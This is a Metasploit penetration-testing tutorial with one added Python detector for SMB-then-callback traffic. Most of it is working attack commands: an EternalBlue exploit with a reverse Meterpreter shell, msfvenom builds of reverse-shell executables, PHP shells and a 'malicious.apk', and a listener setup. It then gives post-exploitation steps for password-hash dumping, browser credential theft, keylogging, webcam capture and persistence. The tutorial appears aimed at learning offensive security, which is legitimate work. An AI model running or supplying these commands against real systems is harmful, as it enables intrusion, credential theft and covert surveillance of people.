Metasploit is the world's most widely used penetration testing framework. It contains over 2,200 exploits, 1,100 auxiliary modules, and 400+ payloads. It is maintained by Rapid7 and comes pre-installed in Kali Linux.
Professional penetration testers use Metasploit daily. Understanding it is non-negotiable for any ethical hacker.
# Initialize Metasploit database (first time only)
sudo msfdb init
# Start Metasploit console
msfconsole
# You'll see the iconic banner and msf6 > prompt
# 1. Search for exploits
msf6 > search eternalblue
msf6 > search type:exploit platform:windows smb
# 2. Select an exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# 3. Show required options
msf6 exploit(ms17_010_eternalblue) > show options
# 4. Set the target
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.5
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100 # your IP
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444
# 5. Select payload
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 6. Run the exploit
msf6 exploit(ms17_010_eternalblue) > run
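From the defender's side, the workflow above leaves a recognizable network pattern: an inbound SMB connection to the target (RHOSTS), followed shortly by an outbound connection from that target back to the same peer (LHOST:LPORT). The following Python detection is an added example, not part of the original tutorial; the flow-record format, the 120-second window, and the sample records are constructed assumptions.

```python
from collections import defaultdict

WINDOW = 120          # seconds between SMB-in and callback-out (assumed value)
DEFAULT_LPORT = 4444  # the LPORT used throughout this page
# Constructed flow records, one TCP connection per line: "epoch src sport dst dport"
SAMPLE_FLOWS = """\
1700000000 192.168.1.100 51544 192.168.1.5 445
1700000004 192.168.1.5 49731 192.168.1.100 4444
1700000010 192.168.1.20 50100 192.168.1.5 445
1700000500 192.168.1.5 49800 192.168.1.20 8080
1700000600 192.168.1.30 50200 192.168.1.7 445
1700000610 192.168.1.7 49900 192.168.1.30 9001
1700000700 192.168.1.5 49950 10.0.0.8 443
"""

def parse_flows(text):
    """Parse flow lines into dicts sorted by time; malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, _sport, dst, dport = parts
        try:
            flows.append({"ts": int(ts), "src": src, "dst": dst, "dport": int(dport)})
        except ValueError:
            continue
    return sorted(flows, key=lambda f: f["ts"])

def find_callbacks(flows, window=WINDOW):
    """Flag hosts that receive SMB (445) from a peer, then connect back to it."""
    smb_seen = defaultdict(list)  # (target, peer) -> times of inbound SMB
    alerts = []
    for f in flows:
        if f["dport"] == 445:
            smb_seen[(f["dst"], f["src"])].append(f["ts"])
            continue
        times = smb_seen.get((f["src"], f["dst"]), [])
        hits = [t for t in times if 0 <= f["ts"] - t <= window]
        if hits:
            alerts.append({
                "host": f["src"], "peer": f["dst"], "port": f["dport"],
                "delay": f["ts"] - max(hits),
                "severity": "high" if f["dport"] == DEFAULT_LPORT else "medium",
            })
    return alerts

if __name__ == "__main__":
    print(*find_callbacks(parse_flows(SAMPLE_FLOWS)), sep="\n")
```

The callback to port 4444 is rated high only because that is the port this page uses; the correlation itself does not depend on the port, so a changed LPORT still produces a medium alert.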
Meterpreter is Metasploit's advanced payload. It runs entirely in memory (no files on disk), encrypts its communication, and is extremely powerful.
# After successful exploit, you get Meterpreter:
meterpreter >
# System information
meterpreter > sysinfo
meterpreter > getuid # Current user
meterpreter > getpid # Process ID
# File operations
meterpreter > ls # List files
meterpreter > pwd # Current directory
meterpreter > download /etc/passwd /tmp/ # Download file
meterpreter > upload malware.exe C:\Users\
# Privilege escalation
meterpreter > getsystem # Try to escalate to SYSTEM
meterpreter > getprivs # List privileges
# Screenshot and webcam
meterpreter > screenshot # Take desktop screenshot
meterpreter > webcam_snap # Capture webcam photo
# Network operations
meterpreter > arp # ARP table
meterpreter > route # Routing table
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.5 # Port forward
# Persistence
meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.100
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
# Linux reverse shell ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell
# PHP reverse shell (Meterpreter)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o malicious.apk
# Set up listener before deploying:
msf6 > use multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.100
msf6 > set LPORT 4444
msf6 > run
# Dump Windows password hashes
meterpreter > run post/windows/gather/hashdump
# Gather saved browser passwords
meterpreter > run post/multi/gather/firefox_creds
# Keylogging
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
# Suggest local privilege-escalation exploits for the compromised host
meterpreter > run post/multi/recon/local_exploit_suggester
⚠️ Remember: Use Metasploit only on machines you own or have written authorization to test. Unauthorized use is a serious crime.